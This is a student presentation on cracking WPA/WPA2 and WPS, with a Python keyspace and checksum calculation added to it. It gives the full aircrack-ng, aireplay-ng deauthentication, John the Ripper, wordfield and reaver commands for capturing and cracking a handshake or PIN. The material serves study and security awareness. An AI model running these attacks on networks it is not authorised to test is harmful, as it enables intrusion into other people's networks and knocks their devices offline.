
WPA EXPLOITATION IN THE WORLD OF WIRELESS NETWORKS

By Hariraj Rathod
8th sem
Department of Electronics and Communication

WIFI (WIRELESS FIDELITY)

Wi-Fi is a popular technology that allows an electronic device to exchange data or connect to the internet wirelessly using radio waves.

Wireless access allows users to connect to the internet from any location within range of a wireless access point.

SOME BASIC TERMS

MAC address (physical address) >> a unique identifier assigned to a network interface for communications
Access point >> wireless router
SSID (service set identifier) >> network name
BSSID (basic service set identifier) >> MAC address of the access point

BASIC WORKING

When a user uses wireless internet they generate what are called data packets. Packets are transmitted between the wireless card and the wireless access point via radio waves whenever the computer is connected to the access point.

BASIC WORKING CONTD.

Depending on how long the computer is connected, it can generate a certain number of packets per day. The more users that are connected to one access point, the more packets are generated.

WIRELESS USES RADIO FREQUENCY

2.4 GHz Wi-Fi spectrum

WIRELESS ENCRYPTION

The main source of vulnerability associated with wireless networks is the method of encryption. The different types of wireless encryption are as follows:

WEP
WPA
WPA2

WEP

Stands for Wired Equivalent Privacy. WEP is recognizable by its key of 10 or 26 hexadecimal digits.
The WEP protocol was not developed by researchers or experts in security and cryptography.
The initial bytes of the key stream depended on just a few bits of the encryption key.

WEP CONTINUED

WEP Encryption Process

ICV: 32-bit integrity check value
IV: initialization vector

WEP CONTINUED

WEP Decryption Process

With multiple wireless clients sending a large amount of data, an attacker can remotely capture large amounts of WEP ciphertext and use cryptanalysis methods to determine the WEP key.

WPA OR WPA2

Stands for Wi-Fi Protected Access.
Created to provide stronger security.
Still able to be cracked if a short password is used.
If a long passphrase or password is used, these protocols are virtually uncrackable.
WPA-PSK with TKIP (Temporal Key Integrity Protocol) or AES (Advanced Encryption Standard) uses a Pre-Shared Key (PSK) that is more than 7 and fewer than 64 characters in length.
WPS (Wi-Fi Protected Setup) is a simple plug-and-play feature.

USING BACKTRACK >>

Some basic Backtrack terms >>

Wlan1 >> wireless interface
Mon0 >> monitor-mode interface
Handshake >> the negotiation process between the computer and a Wi-Fi access point using WPA encryption. Capturing it is needed to crack WPA/WPA2.
Dictionary >> a list of common passwords.
.cap file >> used to store captured packets.

MONITOR MODE

Monitor mode, or RFMON (Radio Frequency MONitor) mode, allows a computer with a wireless network interface controller (WNIC) to monitor all traffic received from the wireless network.
Monitor mode allows packets to be captured without having to associate with an access point first.

TOOLS USED

Airmon-ng >> places wireless cards in monitor mode.
Airodump-ng (packet sniffer) >> tool used to listen to wireless routers in the area.
Aireplay-ng (packet injector) >> used to inject frames. Its primary function is to generate traffic for later use in aircrack-ng for cracking WEP and WPA-PSK keys.
Aircrack-ng >> cracks WEP and WPA (dictionary attack) keys.

TOOLS USED CONTINUED

Word Field (brute force)
Reaver tool (brute force)

AIRCRACK-NG

Selecting the interface to put it in monitor mode. Command used:

airmon-ng start wlan1

AIRCRACK-NG CONTINUED

Start capturing packets:

airodump-ng mon0

Then capture only the chosen access point on its channel and write the packets to a file (the MAC address is a placeholder to fill in from the airodump-ng listing):

airodump-ng --channel 1 --bssid <AP MAC address> -w reddot mon0

AIRCRACK-NG CONTINUED

Deauthenticate the device connected to the access point and force it to re-exchange the WPA key:

aireplay-ng -0 4 -a F4:EC:38:BA:6C:44 -c 90:4C:E5:B2:6F:D8 mon0

where "-0 4" tells aireplay-ng to inject deauthentication packets (4 of them), "-a" is the wireless access point MAC address and "-c" is the client (victim) MAC address.

AIRCRACK-NG CONTINUED

Authentication process in WPA

AIRCRACK-NG CONTINUED

4-way handshake is captured.

AIRCRACK-NG CONTINUED

Cracking the WPA key using aircrack-ng, a dictionary file and the capture file containing the 4-way handshake:

aircrack-ng -w /home/pranav/download/password.lst -b F4:EC:38:BA:6C:44 /home/pranav/reddot01.cap

where "-w" specifies the dictionary file to use and "-b" the BSSID of the access point.

JOHN THE RIPPER

Faster than the previously used tool. John writes candidate passwords to standard output, and aircrack-ng reads them as its wordlist from stdin ("-w -"):

/pentest/password/john-1.7.6.jumbo12/run/john --stdout --incremental=all | aircrack-ng -b 00:17:9A:82:44:1B -w - /home/pranav/test-01.cap

WORD FIELD

Word Field is a brute force attack. Command line used:

wordfield [OPTION...] MINLENGTH [MAXLENGTH]

"wordfield -a -n 8 8" will output all possible alphanumeric strings which are 8 characters long. Piped into aircrack-ng, which again reads the wordlist from stdin:

wordfield -a -n 8 8 | aircrack-ng -b 00:17:9A:82:44:1B -w - /home/pranav/Wifire02.cap

This attack is really effective on weak keys.

WORD FIELD CONTINUED

The run shown below took 22 hours, 7 minutes and 35 seconds.

DICTIONARY AND BRUTE FORCE LIMITATIONS

The passphrase will not necessarily be found in the dictionary list, so a dictionary attack has its limitations.
Brute force techniques require a lot of fast hardware and computational power.

Source: http://lastbit.com/pswcalc.asp

REAVER TOOL

Reaver is a fantastic tool to crack the WPS PIN, written by Craig Heffner.
This tool exploits the 8-digit WPS PIN.
One digit (the last) is a checksum.
That leaves 7 unknown digits, meaning there are 10^7 (10,000,000) possible combinations, which would take approximately 116 days to break at 1 attempt every second.

REAVER TOOL CONTINUED

WPS PIN 65020920

REAVER TOOL CONTINUED

Finding the WPS victim:

wash -i mon0

REAVER TOOL CONTINUED

CRACKING TECHNIQUE

WPS PIN 6502-0920. The PIN is checked in two halves. The first half has 10^4 (10,000) combinations. The last digit of the second half is the checksum, so the second half has only 10^3 (1,000) combinations.
This reduces the time required to break the PIN to just over 3 hours (at most 10,000 + 1,000 = 11,000 attempts), again assuming that 1 attempt is made every second.
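The arithmetic behind the slides' figures, as an added example that is not part of the original deck: the size of the "wordfield -a -n 8 8" keyspace, the WPS check-digit rule from the WPS specification, and why a PIN checked in halves costs 11,000 guesses instead of 10,000,000 (the reason disabling WPS is the usual mitigation). Function names are my own; 65020920 is the PIN shown on the slides; "alphanumeric" is assumed to mean the 62 symbols a-z, A-Z, 0-9.

```python
import string

# Added example, not from the original slides. Assumption: "alphanumeric"
# in "wordfield -a -n" means the 62 symbols a-z, A-Z, 0-9.
ALPHANUMERIC = string.ascii_letters + string.digits  # 62 symbols


def brute_force_guesses(alphabet_size: int, min_len: int, max_len: int) -> int:
    """Worst-case number of candidates for all lengths min_len..max_len."""
    return sum(alphabet_size ** n for n in range(min_len, max_len + 1))


def wps_checksum(first_seven: int) -> int:
    """Check digit of a WPS PIN, computed from its first seven digits (WPS spec rule)."""
    acc = 0
    pin = first_seven
    while pin:
        acc += 3 * (pin % 10)  # 1st, 3rd, 5th and 7th digits (from the left) weigh 3
        pin //= 10
        acc += pin % 10        # 2nd, 4th and 6th digits weigh 1
        pin //= 10
    return (10 - acc % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if pin is 8 digits and its last digit matches the checksum."""
    return len(pin) == 8 and pin.isdigit() and wps_checksum(int(pin[:7])) == int(pin[7])


def wps_guesses(checked_in_halves: bool) -> int:
    """Worst-case PIN guesses: 7 free digits, or 4 free digits then 3 free digits."""
    return 10 ** 4 + 10 ** 3 if checked_in_halves else 10 ** 7


def describe(seconds: float) -> str:
    """Render a duration in hours, days or years, whichever fits."""
    if seconds < 86400:
        return f"{seconds / 3600:.1f} hours"
    if seconds < 365 * 86400:
        return f"{seconds / 86400:.1f} days"
    return f"{seconds / (365 * 86400):.1f} years"


if __name__ == "__main__":
    rate = 1.0  # attempts per second, the slides' assumption
    print("8-char alphanumeric:", describe(brute_force_guesses(len(ALPHANUMERIC), 8, 8) / rate))
    print("WPS PIN, 7 free digits:", describe(wps_guesses(False) / rate))    # 115.7 days
    print("WPS PIN, checked in halves:", describe(wps_guesses(True) / rate))  # 3.1 hours
    print("65020920 has a valid checksum:", is_valid_wps_pin("65020920"))    # True
```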

REAVER TOOL CONTINUED

reaver -i mon0 -b F4:EC:38:BA:6C:44

REAVER TOOL CONTINUED

BE SECURED


THANKS : )